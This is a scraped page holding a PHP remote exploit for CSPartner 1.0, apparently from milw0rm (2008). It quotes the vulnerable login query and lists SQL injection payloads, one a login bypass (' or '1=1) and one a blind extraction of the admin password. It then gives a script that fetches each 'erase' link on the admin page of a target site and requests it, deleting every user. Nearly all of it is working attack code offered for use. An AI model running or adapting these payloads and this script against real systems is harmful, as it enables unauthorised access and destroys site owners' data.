Loading ...
Global Do...
News & Politics
4
0
Try Now
Log In
Pricing
1 <?php 2 3 /* 4 5 CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit 6 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 7 By StAkeR[at]hotmail[dot]it 8 http://www.easy−script.com/scripts−dl/cspartne−01.zip 9 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 10 11 File gestion.php 12 13 5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){ 14 6. $sql = "SELECT * FROM $tblPartner where pseudo=’".$_POST["pseudo"]."’ AND password=’".$_POST["passe"]."’"; 15 7. $resultat = mysql_db_query($mydbPartner, $sql); 16 17 Blind SQL Injection or Login ByPass for you :P 18 19 Examples: ($_POST[’pseudo’] and $_POST[’passe’]) 20 21 −1 ’ or ’1=1 22 −2 ’ or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/* 23 −3 and other :D 24 25 26 27 */ 28 29 30 error_reporting(0); 31 32 $host = $argv[1] or die("Usage: php [exploit.php] [http://localhost/cms]\n"); 33 34 if(preg_match_all(’/erase=(.+?)"/’,file_get_contents($host.’/admin/index.php’),$out)) 35 { 36 for($i=0;$i<=count($out);$i++) 37 { 38 file_get_contents($host.’/admin/index.php?erase=’.$out[1][$i]); 39 } 40 echo "[−] All Users Deleted\n"; 41 } 42 else 43 { 44 echo "[−] Exploit Failed!\n"; 45 } 46 47 # milw0rm.com [2008−10−23] Page 1/1 CSPartner 1.0 Delete All UsersSQL Injection Remote Exploit StAkeR 10/23/2008
